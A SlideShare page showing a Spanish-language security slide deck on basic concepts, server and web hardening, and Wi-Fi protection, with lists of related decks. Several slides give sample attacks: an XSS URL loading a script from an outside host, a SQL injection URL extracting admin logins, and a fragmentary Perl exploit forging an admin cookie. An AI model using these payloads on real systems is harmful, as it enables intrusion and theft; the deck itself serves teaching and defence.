SlideShare une entreprise Scribd logo
1  sur  31
Seguridad Informática
- Fundamentos de la seguridad informática
- Seguridad en ambiente de servidores
-
- Seguridad en plataformas Web
- Cómo proteger las redes Wi-Fi
- Recomendaciones generales para Internet
Seguridad Informática
http://www.seguridad-informatica.cl
CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA

CONFIDENCIALIDAD

INTEGRIDAD

DISPONIBILIDAD

AUTENTICIDAD
Seguridad Informática
http://www.seguridad-informatica.cl
CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA
No existe la absoluta seguridad !!
Todo es rompible si se le aplica fuerza. Una caja de vidrio
se puede romper, pero también una caja fuerte de titanio.
¿Qué es más seguro: la caja de vidrio o la de titanio?
Evidentemente la de titanio, pero esto depende solamente
de que herramienta utilicemos para romperla.
Todo se puede vulnerar. La única razón por la cual
utilizamos rejas de fierros en nuestras casas y los bancos
es porque hace que el ataque sea más lento.
Seguridad Informática
http://www.seguridad-
informatica.cl
CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA
Entonces, ¿Cómo nos protegemos de la forma más
eficiente posible?

Determinando que queremos proteger (ej: Hardware,
datos privados, datos públicos, sistemas, etc)

Estableciendo prioridades de los factores a proteger

Formando políticas de seguridad

Manteniendo la seguridad en el tiempo
Seguridad Informática
http://www.seguridad-informatica.cl
CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA
Debemos enfocarnos en REDUCIR EL RIESGO, y no en
tratar de eliminar las amenazas, ya que es imposible.
Para eso debemos saber de QUE o QUIENES nos
protegemos y también COMO nos atacan.
Seguridad Informática
http://www.seguridad-informatica.cl
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
Ataques Internos
- Premeditación (Empleados mal intencionados o ex empleados con
información privilegiada)
- Descuido
- Ignorancia
- Indiferencia de las politicas de seguridad
Ataques externos
-
- Hackers, Crackers, Lammers, Script-Kiddies
-
- Motivaciones: Ranking, reto personal, robo de datos, pruebas (pen test),
etc.
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
Ataques Internos
•
Suplantación de identidad
•
Sniffing (Incluso administradores pueden hacer sniffing.
Sugerencia: CIFRAR)
•
Robo de información (Ej: para la competencia)
•
Virus, Troyanos, Gusanos
•
Espionaje: Trashing, Shoulder Surfing, Grabaciones, etc
Keylogging - Keycatching
Keycatcher:
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
Ataques Externos
•
Ataques contra servicios WEB
•
Cross Site Scripting (XSS)
•
SQL Injection
•
Exploits
•
Robo de Identidad
•
Denegación de Servicio (DoS) y Denegación de Servicio
Distribuido (DDoS)
•
SPAM
•
VIRUS
•
Phishing (Whishing, Hishing)
•
Troyanos
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
XSS
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
XSS:
http://docs.info.apple.com/article.html?
artnum=';a=document.createElement('script');a.src='http://h4k.in/i.j
s';document.body.appendChild(a);//';alert(1)//%22;alert(2)//
%22;alert(3)//--%3E
SQL Injection:
http://www.sitiovulnerable.com/index.php?id=10 UNION SELECT
TOP 1 login_name FROM admin_login--
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
$host=shift;
if ($host eq "") {
print "Usage: webeye-xp.pl <host name>n";
exit;
}
my $browser = LWP::UserAgent->new();
my $resp = $browser->get("http://$host/admin/wg_user-
info.ml","Cookie","USER_ID=0; path=/;");
$t = $resp->content;
#print $t;
";
Ejemplo de un exploit en PERL:
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
CONVIRTIENDO NUESTROS SERVICIOS EN FORTALEZAS
Seguridad Informática
http://www.seguridad-informatica.cl
¿COMO NOS DEFENDEMOS?
Debemos crear una lista de ”mandamientos” que debemos
seguir al pie de la letra.
No olvidarse que el hecho de no cumplir con alguno de estos
mandamientos inevitablemente caeremos en un mayor riesgo
para los servicios que queremos proteger.
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
LOS MANDAMIENTOS MAS IMPORTANTES DE SEGURIDAD

Siempre respetar las políticas de seguridad

Siempre tener nuestros servicios actualizados a la última versión
conocida estable

Utilizar mecanismos de criptografía para almacenar y transmitir
datos sensibles

Cambiar las claves cada cierto tiempo

Auto-auditar nuestros propios servicios. Autoatacarnos para saber
si somos o no vulnerables

Estar siempre alerta. Nunca pensar ”a nosotros nadie nos ataca”.

No dejar respaldos con información sensible en directorios web

No usar las mismas claves para servicios distintos (ej, la clave de
root sea la misma que la de MySQL)
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
SERVICIOS DE INTERNET
- Cambiar los puertos por defecto
- Garantizar el acceso solo a cuentas específicas
- Aplicar técnicas de Hardening
- Para servicios privados y confidenciales utilizar túneles seguros (VPN cifradas)
en Internet y redes no seguras
- Eliminar todos los banners posibles y sobre todo las versiones
- Habilitar módulos de seguridad (Ej mod_security en Apache)
- Levantar Firewalls e IDS/IPS
- Crear cuentas de sistema restringidas (aunque no tengan privilegios)
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
- Nunca trabajar con ”root” si no es estrictamente necesario
- Proteger con doble contraseña si es posible
- Elegir contraseñas seguras, mezclando mayúsculas, minúsculas, números y caracteres
especiales. Las claves no deben ser palabras coherentes (ej: Admin25)
- Cerrar puertos y eliminar aplicaciones innecesarias
- Borrar robots.txt y estadísticas públicas
- Proteger las URL (ej: mod_rewrite)
SERVICIOS DE INTERNETSERVICIOS DE INTERNET
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
SERVICIOS DE INTERNET
- Tener cuidado con los archivos temporales en directorios WEB. Ejemplo:
index.php~ (terminados en caracter “squiggle” o “pigtail (literalmente: cola de chancho)”
- Realizar respaldos periódicamente y probar que funcionen
- Conocer las técnicas de ataque más conocidas
- Auditar los códigos con herramientas de seguridad
- Si ejecutan algún servidor de base de datos, permitir solamente comunicación con interfaz
loopback y no dejar sin contraseña las bases de datos.
- En lo posible no utilizar servicios como:
- WEBMIN
- phpMyAdmin
- Interfaces WEB en routers o dispositivos de red
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
UN POCO MAS DE SEGURIDAD CON APACHE Y PHP
Apache. En httpd.conf activar las siguientes directivas:
ServerTokens Prod
ServerSignature Off
ServerAdmin <direccion@decorreo.com>
habilitar mod_security y mod_rewrite
PHP .En php.ini
php_expose=off
“esconde php”
mode_safe=on
evita que se ejecuten funciones como system(), passthru(), exec(), etc.
evitar scripts con phpinfo();
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
Algunos ejemplos:
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
http://www.seguridad-informatica.cl
Algunos ejemplos:
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Dirección: http://www.sitioweb.com/config.php
ESTA PAGINA ES PRIVADA
Seguridad Informática
http://www.seguridad-informatica.cl
Algunos ejemplos:
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Dirección: http://www.sitioweb.com/config.php~
<?php
/*Variables base de datos*/
$sys['db_host'] = "localhost";
$sys['db_username'] = "root";
$sys['db_password'] = "123";
$sys['db_database'] = "base_de_datos";
echo "<center>ESTA PAGINA ES PRIVADA";
?>
Seguridad Informática
http://www.seguridad-informatica.cl
Algunos ejemplos:
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Solución al problema anterior: UN CRON QUE ELIMINE LOS ARCHIVOS
TEMPORALES
/etc/crontab
*/5 * * * * root rm /var/www/*.*~
Seguridad Informática
http://www.seguridad-informatica.cl
PROTECCIÓN DE REDES WI-FI
Seguridad Informática
http://www.seguridad-informatica.cl
PROTECCIÓN DE REDES WI-FI
EL GRAN PROBLEMA DE LAS REDES WI-FI ES GRAN EXTENSIÓN
FÍSICA (No hay cables) LO QUE CONLLEVA A QUE SEA MÁS FÁCIL
ACCEDER A ELLAS REMOTAMENTE
EXISTEN UNA SERIE DE MEDIDAS QUE SE PUEDEN TOMAR PARA
REDUCIR EL RIESGO DE ATAQUES.
Seguridad Informática
http://www.seguridad-informatica.cl
PROTECCIÓN DE REDES WI-FI

Apagar el router o access point cuando no se ocupe

Nunca entregar la clave Wi-Fi a terceros

Utilizar claves de tipo WPA2. Como segunda opción WPA y en el peor de los
casos WEP (128 y 64 bits)

Habilitar el control de acceso por MAC. Son fáciles de clonar pero pone una
barrera más

Deshabilitar servicios innecesarios en el router (SNMP, Telnet, SSH, etc)

Deshabilitar el acceso inalámbrico a la configuración

Cambiar los puertos por defecto de los servicios necesarios en el router (ej:
http a 1000)

Desactivar el broadcasting SSID

Desactivar DHCP. Utilizar sólo IP manuales dentro de rangos poco
convencionales. (Ej: 90.0.10.0 – 90.0.10.254)

Usar VPN si fuese posible.
Seguridad Informática
http://www.seguridad-informatica.cl
PROTECCIÓN DE REDES WI-FI

Cambiar regularmente las claves Wi-Fi (tanto administración como clave de
red).

Guardar bien las claves de administración

Usar contraseñas complicadas. (Ej: E_aR@_1-x

No usar dispositivos Wi-Fi cerca de hornos microondas ni teléfonos
inalámbricos

Realizar un scaneo local de las redes disponibles para evitar interferencias.
LOS CANALES QUE NO SE INTERFIEREN SON: 1, 6 y 11
Seguridad Informática
http://www.seguridad-informatica.cl
HERRAMIENTAS DE SEGURIDAD
Seguridad Informática
http://www.seguridad-informatica.cl
HERRAMIENTAS DE SEGURIDAD
COMERCIALES
GFI LANGUARD SECURITY SCANNERGFI LANGUARD SECURITY SCANNER
www.gfi.com
N-Stalker (ex N-Stealth)N-Stalker (ex N-Stealth)
www.nstalker.com
ACUNETIX WEB SCANNERACUNETIX WEB SCANNER
www.acunetix.com
Seguridad Informática
http://www.seguridad-informatica.cl
HERRAMIENTAS DE SEGURIDAD
GRATIS
NMAP (Network Mapper)NMAP (Network Mapper)
www.insecure.org/nmap NESSUSNESSUS
www.nessus.org
Seguridad Informática
http://www.seguridad-informatica.cl
¿¿PREGUNTAS??

Contenu connexe

Tendances

Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"Alonso Caballero
 
Ayuda Web Seguridad Romero Gt
Ayuda Web Seguridad Romero GtAyuda Web Seguridad Romero Gt
Ayuda Web Seguridad Romero GtMauricio Romero
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticaLorena Arroyo
 
Proteccion de transacciones en linea
Proteccion de transacciones en lineaProteccion de transacciones en linea
Proteccion de transacciones en lineaFernanda Loyola
 
Webinar Gratuito: Crear un Medio Infectado con Metasploit Framework
Webinar Gratuito: Crear un Medio Infectado con Metasploit FrameworkWebinar Gratuito: Crear un Medio Infectado con Metasploit Framework
Webinar Gratuito: Crear un Medio Infectado con Metasploit FrameworkAlonso Caballero
 
Links videos didacticos y herramienta de simulacion
Links videos didacticos y herramienta de simulacionLinks videos didacticos y herramienta de simulacion
Links videos didacticos y herramienta de simulacionUNAD
 
Tareas básicas de internet. Comercio digital
Tareas básicas de internet. Comercio digitalTareas básicas de internet. Comercio digital
Tareas básicas de internet. Comercio digitaljanerodriguezc
 
Desarrollo Seguro en Drupal - DrupalCamp Spain 2013
Desarrollo Seguro en Drupal - DrupalCamp Spain 2013Desarrollo Seguro en Drupal - DrupalCamp Spain 2013
Desarrollo Seguro en Drupal - DrupalCamp Spain 2013zekivazquez
 

Tendances (13)

Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"
 
Peligros Internet Padres
Peligros Internet PadresPeligros Internet Padres
Peligros Internet Padres
 
Ayuda Web Seguridad Romero Gt
Ayuda Web Seguridad Romero GtAyuda Web Seguridad Romero Gt
Ayuda Web Seguridad Romero Gt
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Proteccion de transacciones en linea
Proteccion de transacciones en lineaProteccion de transacciones en linea
Proteccion de transacciones en linea
 
Webinar Gratuito: Crear un Medio Infectado con Metasploit Framework
Webinar Gratuito: Crear un Medio Infectado con Metasploit FrameworkWebinar Gratuito: Crear un Medio Infectado con Metasploit Framework
Webinar Gratuito: Crear un Medio Infectado con Metasploit Framework
 
Grooming hacking
Grooming hackingGrooming hacking
Grooming hacking
 
Links videos didacticos y herramienta de simulacion
Links videos didacticos y herramienta de simulacionLinks videos didacticos y herramienta de simulacion
Links videos didacticos y herramienta de simulacion
 
Tareas básicas de internet. Comercio digital
Tareas básicas de internet. Comercio digitalTareas básicas de internet. Comercio digital
Tareas básicas de internet. Comercio digital
 
Desarrollo Seguro en Drupal - DrupalCamp Spain 2013
Desarrollo Seguro en Drupal - DrupalCamp Spain 2013Desarrollo Seguro en Drupal - DrupalCamp Spain 2013
Desarrollo Seguro en Drupal - DrupalCamp Spain 2013
 
Evitar robos
Evitar robosEvitar robos
Evitar robos
 
Tmg
TmgTmg
Tmg
 
6 consejos de seguridad para tu empresa
6 consejos de seguridad para tu empresa6 consejos de seguridad para tu empresa
6 consejos de seguridad para tu empresa
 

En vedette

En vedette (20)

Pacie mpi
Pacie mpiPacie mpi
Pacie mpi
 
Cursoefamiliar1
Cursoefamiliar1Cursoefamiliar1
Cursoefamiliar1
 
2.1 definicion de sistema
2.1 definicion de sistema2.1 definicion de sistema
2.1 definicion de sistema
 
Doc2
Doc2Doc2
Doc2
 
Motivacion
MotivacionMotivacion
Motivacion
 
Otras funciones
Otras funcionesOtras funciones
Otras funciones
 
Publico y privado en colombia y en original 111
Publico y privado en colombia y en original 111Publico y privado en colombia y en original 111
Publico y privado en colombia y en original 111
 
Create bootable copy of mountain lion
Create bootable copy of mountain lion Create bootable copy of mountain lion
Create bootable copy of mountain lion
 
Presup Empr Ind - Lect 4
Presup Empr Ind - Lect 4Presup Empr Ind - Lect 4
Presup Empr Ind - Lect 4
 
Perspectiva
PerspectivaPerspectiva
Perspectiva
 
Cruzadas sandra
Cruzadas sandraCruzadas sandra
Cruzadas sandra
 
Presentacion autores
Presentacion autoresPresentacion autores
Presentacion autores
 
Pacie-Interacción
Pacie-InteracciónPacie-Interacción
Pacie-Interacción
 
2
22
2
 
Presentación2
Presentación2Presentación2
Presentación2
 
Asignación #6 - GEMA1000
Asignación #6 - GEMA1000Asignación #6 - GEMA1000
Asignación #6 - GEMA1000
 
Anthony Nuñez y Karol Guerron Diagramas De Flujo
Anthony Nuñez y Karol Guerron Diagramas De Flujo Anthony Nuñez y Karol Guerron Diagramas De Flujo
Anthony Nuñez y Karol Guerron Diagramas De Flujo
 
Tableau plaidoirie 515(10)a) c.cr
Tableau plaidoirie   515(10)a) c.crTableau plaidoirie   515(10)a) c.cr
Tableau plaidoirie 515(10)a) c.cr
 
Infa-Micron Kassettenfilter MKR
Infa-Micron Kassettenfilter MKRInfa-Micron Kassettenfilter MKR
Infa-Micron Kassettenfilter MKR
 
Afiche taller geogebra tunuyan 11
Afiche taller geogebra tunuyan  11Afiche taller geogebra tunuyan  11
Afiche taller geogebra tunuyan 11
 

Similaire à Seguridad Informática: Conceptos y Recomendaciones

Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticaJohan Pérez
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticadari123
 
Seguridad Informatica, via Meeting.cl
Seguridad Informatica, via Meeting.clSeguridad Informatica, via Meeting.cl
Seguridad Informatica, via Meeting.clCristian Sepulveda
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticacaanamlo
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticaangupo
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticazulygomez1
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticaangupo
 
Web App Security, Ethical hacking for CodeCamp SDQ 5
Web App Security, Ethical hacking for CodeCamp SDQ 5Web App Security, Ethical hacking for CodeCamp SDQ 5
Web App Security, Ethical hacking for CodeCamp SDQ 5Jose Gratereaux
 
Modulo 10: Conceptos de Seguridad de LAN
Modulo 10: Conceptos de Seguridad de LANModulo 10: Conceptos de Seguridad de LAN
Modulo 10: Conceptos de Seguridad de LANsrkamote
 
Seguridad de información para criptoactivos
Seguridad de información para criptoactivosSeguridad de información para criptoactivos
Seguridad de información para criptoactivosEudy Zerpa
 
Atacando servicios web
Atacando servicios webAtacando servicios web
Atacando servicios weblimahack
 
Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Webacksec
 
Seguridad informática y de ti
Seguridad informática y de tiSeguridad informática y de ti
Seguridad informática y de tiMario Nizama
 
Seguridad de los dispositivos de red
Seguridad de los dispositivos de redSeguridad de los dispositivos de red
Seguridad de los dispositivos de redCarlitos Alvarado
 
Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securityseguridadelinux
 

Similaire à Seguridad Informática: Conceptos y Recomendaciones (20)

Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad Informatica, via Meeting.cl
Seguridad Informatica, via Meeting.clSeguridad Informatica, via Meeting.cl
Seguridad Informatica, via Meeting.cl
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Web App Security, Ethical hacking for CodeCamp SDQ 5
Web App Security, Ethical hacking for CodeCamp SDQ 5Web App Security, Ethical hacking for CodeCamp SDQ 5
Web App Security, Ethical hacking for CodeCamp SDQ 5
 
Modulo 10: Conceptos de Seguridad de LAN
Modulo 10: Conceptos de Seguridad de LANModulo 10: Conceptos de Seguridad de LAN
Modulo 10: Conceptos de Seguridad de LAN
 
Seguridad de información para criptoactivos
Seguridad de información para criptoactivosSeguridad de información para criptoactivos
Seguridad de información para criptoactivos
 
Atacando servicios web
Atacando servicios webAtacando servicios web
Atacando servicios web
 
Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015
 
Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Web
 
Consejos de seguridad
Consejos de seguridadConsejos de seguridad
Consejos de seguridad
 
Seguridad informática y de ti
Seguridad informática y de tiSeguridad informática y de ti
Seguridad informática y de ti
 
Seguridad de los dispositivos de red
Seguridad de los dispositivos de redSeguridad de los dispositivos de red
Seguridad de los dispositivos de red
 
Seguridad Global
Seguridad GlobalSeguridad Global
Seguridad Global
 
Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_security
 

Dernier

Fundamentos y Principios de Psicopedagogía..pdf
Fundamentos y Principios de Psicopedagogía..pdfFundamentos y Principios de Psicopedagogía..pdf
Fundamentos y Principios de Psicopedagogía..pdfsamyarrocha1
 
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdf
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdfTarea 5_ Foro _Selección de herramientas digitales_Manuel.pdf
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdfManuel Molina
 
Plan Año Escolar Año Escolar 2023-2024. MPPE
Plan Año Escolar Año Escolar 2023-2024. MPPEPlan Año Escolar Año Escolar 2023-2024. MPPE
Plan Año Escolar Año Escolar 2023-2024. MPPELaura Chacón
 
Día de la Madre Tierra-1.pdf día mundial
Día de la Madre Tierra-1.pdf día mundialDía de la Madre Tierra-1.pdf día mundial
Día de la Madre Tierra-1.pdf día mundialpatriciaines1993
 
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptxPresentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptxYeseniaRivera50
 
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdf
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdfBIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdf
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdfCESARMALAGA4
 
periodico mural y sus partes y caracteristicas
periodico mural y sus partes y caracteristicasperiodico mural y sus partes y caracteristicas
periodico mural y sus partes y caracteristicas123yudy
 
c3.hu3.p1.p3.El ser humano como ser histórico.pptx
c3.hu3.p1.p3.El ser humano como ser histórico.pptxc3.hu3.p1.p3.El ser humano como ser histórico.pptx
c3.hu3.p1.p3.El ser humano como ser histórico.pptxMartín Ramírez
 
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptx
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptxLINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptx
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptxdanalikcruz2000
 
Mapa Mental de estrategias de articulación de las areas curriculares.pdf
Mapa Mental de estrategias de articulación de las areas curriculares.pdfMapa Mental de estrategias de articulación de las areas curriculares.pdf
Mapa Mental de estrategias de articulación de las areas curriculares.pdfvictorbeltuce
 
SINTAXIS DE LA ORACIÓN SIMPLE 2023-2024.pptx
SINTAXIS DE LA ORACIÓN SIMPLE 2023-2024.pptxSINTAXIS DE LA ORACIÓN SIMPLE 2023-2024.pptx
SINTAXIS DE LA ORACIÓN SIMPLE 2023-2024.pptxlclcarmen
 
CIENCIAS NATURALES 4 TO ambientes .docx
CIENCIAS NATURALES 4 TO  ambientes .docxCIENCIAS NATURALES 4 TO  ambientes .docx
CIENCIAS NATURALES 4 TO ambientes .docxAgustinaNuez21
 
PPT GESTIÓN ESCOLAR 2024 Comités y Compromisos.pptx
PPT GESTIÓN ESCOLAR 2024 Comités y Compromisos.pptxPPT GESTIÓN ESCOLAR 2024 Comités y Compromisos.pptx
PPT GESTIÓN ESCOLAR 2024 Comités y Compromisos.pptxOscarEduardoSanchezC
 
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptxc3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptxMartín Ramírez
 
TEST DE RAVEN es un test conocido para la personalidad.pdf
TEST DE RAVEN es un test conocido para la personalidad.pdfTEST DE RAVEN es un test conocido para la personalidad.pdf
TEST DE RAVEN es un test conocido para la personalidad.pdfDannyTola1
 
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIA
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIARAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIA
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIACarlos Campaña Montenegro
 

Dernier (20)

VISITA À PROTEÇÃO CIVIL _
VISITA À PROTEÇÃO CIVIL                  _VISITA À PROTEÇÃO CIVIL                  _
VISITA À PROTEÇÃO CIVIL _
 
Fundamentos y Principios de Psicopedagogía..pdf
Fundamentos y Principios de Psicopedagogía..pdfFundamentos y Principios de Psicopedagogía..pdf
Fundamentos y Principios de Psicopedagogía..pdf
 
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdf
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdfTarea 5_ Foro _Selección de herramientas digitales_Manuel.pdf
Tarea 5_ Foro _Selección de herramientas digitales_Manuel.pdf
 
Plan Año Escolar Año Escolar 2023-2024. MPPE
Plan Año Escolar Año Escolar 2023-2024. MPPEPlan Año Escolar Año Escolar 2023-2024. MPPE
Plan Año Escolar Año Escolar 2023-2024. MPPE
 
Día de la Madre Tierra-1.pdf día mundial
Día de la Madre Tierra-1.pdf día mundialDía de la Madre Tierra-1.pdf día mundial
Día de la Madre Tierra-1.pdf día mundial
 
PPTX: La luz brilla en la oscuridad.pptx
PPTX: La luz brilla en la oscuridad.pptxPPTX: La luz brilla en la oscuridad.pptx
PPTX: La luz brilla en la oscuridad.pptx
 
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptxPresentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
 
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdf
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdfBIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdf
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdf
 
periodico mural y sus partes y caracteristicas
periodico mural y sus partes y caracteristicasperiodico mural y sus partes y caracteristicas
periodico mural y sus partes y caracteristicas
 
c3.hu3.p1.p3.El ser humano como ser histórico.pptx
c3.hu3.p1.p3.El ser humano como ser histórico.pptxc3.hu3.p1.p3.El ser humano como ser histórico.pptx
c3.hu3.p1.p3.El ser humano como ser histórico.pptx
 
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptx
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptxLINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptx
LINEAMIENTOS INICIO DEL AÑO LECTIVO 2024-2025.pptx
 
Mapa Mental de estrategias de articulación de las areas curriculares.pdf
Mapa Mental de estrategias de articulación de las areas curriculares.pdfMapa Mental de estrategias de articulación de las areas curriculares.pdf
Mapa Mental de estrategias de articulación de las areas curriculares.pdf
 
SINTAXIS DE LA ORACIÓN SIMPLE 2023-2024.pptx
SINTAXIS DE LA ORACIÓN SIMPLE 2023-2024.pptxSINTAXIS DE LA ORACIÓN SIMPLE 2023-2024.pptx
SINTAXIS DE LA ORACIÓN SIMPLE 2023-2024.pptx
 
Earth Day Everyday 2024 54th anniversary
Earth Day Everyday 2024 54th anniversaryEarth Day Everyday 2024 54th anniversary
Earth Day Everyday 2024 54th anniversary
 
CIENCIAS NATURALES 4 TO ambientes .docx
CIENCIAS NATURALES 4 TO  ambientes .docxCIENCIAS NATURALES 4 TO  ambientes .docx
CIENCIAS NATURALES 4 TO ambientes .docx
 
Sesión de clase: Defendamos la verdad.pdf
Sesión de clase: Defendamos la verdad.pdfSesión de clase: Defendamos la verdad.pdf
Sesión de clase: Defendamos la verdad.pdf
 
PPT GESTIÓN ESCOLAR 2024 Comités y Compromisos.pptx
PPT GESTIÓN ESCOLAR 2024 Comités y Compromisos.pptxPPT GESTIÓN ESCOLAR 2024 Comités y Compromisos.pptx
PPT GESTIÓN ESCOLAR 2024 Comités y Compromisos.pptx
 
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptxc3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
 
TEST DE RAVEN es un test conocido para la personalidad.pdf
TEST DE RAVEN es un test conocido para la personalidad.pdfTEST DE RAVEN es un test conocido para la personalidad.pdf
TEST DE RAVEN es un test conocido para la personalidad.pdf
 
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIA
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIARAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIA
RAIZ CUADRADA Y CUBICA PARA NIÑOS DE PRIMARIA
 

Seguridad Informática: Conceptos y Recomendaciones